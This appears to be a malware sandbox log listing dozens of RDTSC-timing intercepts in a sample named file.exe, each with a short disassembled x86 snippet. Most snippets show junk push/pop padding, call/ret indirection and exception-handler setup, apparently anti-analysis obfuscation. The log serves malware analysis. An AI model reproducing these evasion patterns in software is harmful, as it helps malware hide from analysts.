Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6E8 second address: 3BF719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c mov bl, 55h 0x0000000e mov edi, ebx 0x00000010 popad 0x00000011 push 00000000h 0x00000013 mov esi, 1D62357Fh 0x00000018 jnl 00007F856106A856h 0x0000001e push 00000000h 0x00000020 adc esi, 26CFC74Dh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jng 00007F856106A858h 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BFEE2 second address: 3BFEED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F856102FBE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C0EDF second address: 3C0EE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C1BF0 second address: 3C1BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C321D second address: 3C3222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C58BE second address: 3C58C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C58C7 second address: 3C58D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C58D2 second address: 3C58E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F856102FBE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C58E1 second address: 3C58E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C6EA9 second address: 3C6EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C4615 second address: 3C461B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3841AE second address: 3841CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CB094 second address: 3CB098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CB6D9 second address: 3CB6DF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3769A4 second address: 3769B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jmp 00007F856106A85Eh 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CB881 second address: 3CB911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F856102FBE6h 0x0000000a popad 0x0000000b jno 00007F856102FBECh 0x00000011 popad 0x00000012 nop 0x00000013 mov ebx, dword ptr [ebp+122D35BCh] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F856102FBE8h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov bx, 67F1h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov dword ptr [ebp+12451F10h], eax 0x0000004b mov eax, dword ptr [ebp+122D01F9h] 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007F856102FBE8h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 00000017h 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b je 00007F856102FBE6h 0x00000071 push FFFFFFFFh 0x00000073 jmp 00007F856102FBEAh 0x00000078 nop 0x00000079 push esi 0x0000007a push eax 0x0000007b push edx 0x0000007c push ecx 0x0000007d pop ecx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3769B9 second address: 3769BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3769BF second address: 3769C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3769C3 second address: 3769C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CFA5B second address: 3CFA9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F856102FBE6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F856102FBE8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov ebx, 34BE0413h 0x00000030 push 00000000h 0x00000032 and edi, 683739B4h 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CECA4 second address: 3CECAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CFA9F second address: 3CFAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D0CE4 second address: 3D0CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F856106A856h 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F856106A856h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D1D9E second address: 3D1DB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D2CD2 second address: 3D2CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D3A4E second address: 3D3A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D2CD8 second address: 3D2CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D3A52 second address: 3D3A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D2CDC second address: 3D2D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jno 00007F856106A85Ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jmp 00007F856106A85Eh 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jmp 00007F856106A865h 0x00000027 jc 00007F856106A86Bh 0x0000002d call 00007F856106A862h 0x00000032 pushad 0x00000033 popad 0x00000034 pop ebx 0x00000035 mov eax, dword ptr [ebp+122D02CDh] 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007F856106A858h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000015h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push ebp 0x0000005a call 00007F856106A858h 0x0000005f pop ebp 0x00000060 mov dword ptr [esp+04h], ebp 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc ebp 0x0000006d push ebp 0x0000006e ret 0x0000006f pop ebp 0x00000070 ret 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 ja 00007F856106A85Ch 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B0A second address: 3D4B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B17 second address: 3D4B21 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B21 second address: 3D4B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B27 second address: 3D4B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F856106A858h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov ebx, 33EBC76Fh 0x0000002a push 00000000h 0x0000002c mov ebx, 0F8DEF57h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B61 second address: 3D4B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B65 second address: 3D4B74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6BEC second address: 3D6BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6BF0 second address: 3D6C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856106A862h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jne 00007F856106A856h 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6C14 second address: 3D6C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6C19 second address: 3D6C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856106A864h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F856106A85Dh 0x00000012 xor edi, dword ptr [ebp+122D364Ch] 0x00000018 pop edi 0x00000019 mov ebx, dword ptr [ebp+122D3804h] 0x0000001f push 00000000h 0x00000021 or dword ptr [ebp+122D2C6Dh], esi 0x00000027 mov ebx, dword ptr [ebp+122D29FDh] 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 and cx, 12CEh 0x00000035 popad 0x00000036 xchg eax, esi 0x00000037 push ecx 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D8D1D second address: 3D8D3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F856102FBF9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D8D3B second address: 3D8DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F856106A865h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F856106A858h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 and di, B1F0h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F856106A858h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, 3EB1A6C9h 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+1247D8FCh], eax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D8DBA second address: 3D8DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D8DC0 second address: 3D8DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6E87 second address: 3D6E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6E8C second address: 3D6E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DD0CE second address: 3DD13C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D3734h] 0x00000012 jp 00007F856102FBF8h 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b or ch, FFFFFF8Ch 0x0000001e mov dword ptr [ebp+122D1DB7h], edx 0x00000024 popad 0x00000025 push 00000000h 0x00000027 jmp 00007F856102FBF5h 0x0000002c xchg eax, esi 0x0000002d jmp 00007F856102FBEDh 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 ja 00007F856102FBE6h 0x0000003c pop eax 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DC434 second address: 3DC43A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DC43A second address: 3DC448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DD290 second address: 3DD294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DD294 second address: 3DD29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3E1D32 second address: 3E1D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC6B6 second address: 3EC6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC6BA second address: 3EC6D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC6D8 second address: 3EC6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F856102FBF8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC6FC second address: 3EC70F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F856106A85Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC70F second address: 3EC72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a pushad 0x0000000b jmp 00007F856102FBF2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EC977 second address: 3EC97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EF27D second address: 3EF282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EF282 second address: 3EF28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F856106A856h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EF28C second address: 3EF290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3783BE second address: 3783C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3783C8 second address: 3783CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3783CC second address: 3783D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F42E4 second address: 3F4302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 jng 00007F856102FBFDh 0x0000000c jmp 00007F856102FBEFh 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F30B8 second address: 3F30C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F856106A856h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F39A2 second address: 3F39A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F3AFC second address: 3F3B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3F8A0D second address: 3F8A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 jmp 00007F856102FBECh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FE333 second address: 3FE35D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A864h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F856106A860h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FE35D second address: 3FE3A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F856102FBE6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F856102FBF0h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jnc 00007F856102FBE6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e jmp 00007F856102FBF0h 0x00000023 jnc 00007F856102FBE8h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D4AB second address: 37D4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D4AF second address: 37D4BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F856102FBE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FCEE5 second address: 3FCF02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Ah 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F856106A858h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FCF02 second address: 3FCF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBEDh 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F856102FBF8h 0x00000010 popad 0x00000011 jl 00007F856102FBECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FCF36 second address: 3FCF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FCF3A second address: 3FCF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F856102FBE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD097 second address: 3FD0AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F856106A856h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F856106A85Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD0AE second address: 3FD0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD0B6 second address: 3FD0DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856106A85Ah 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F856106A862h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD7D0 second address: 3FD7F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F856102FBE6h 0x00000010 jns 00007F856102FBE6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD7F9 second address: 3FD81D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F856106A856h 0x00000009 jnl 00007F856106A856h 0x0000000f pop esi 0x00000010 ja 00007F856106A858h 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ecx 0x0000001b push edi 0x0000001c jo 00007F856106A856h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD81D second address: 3FD828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD828 second address: 3FD82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
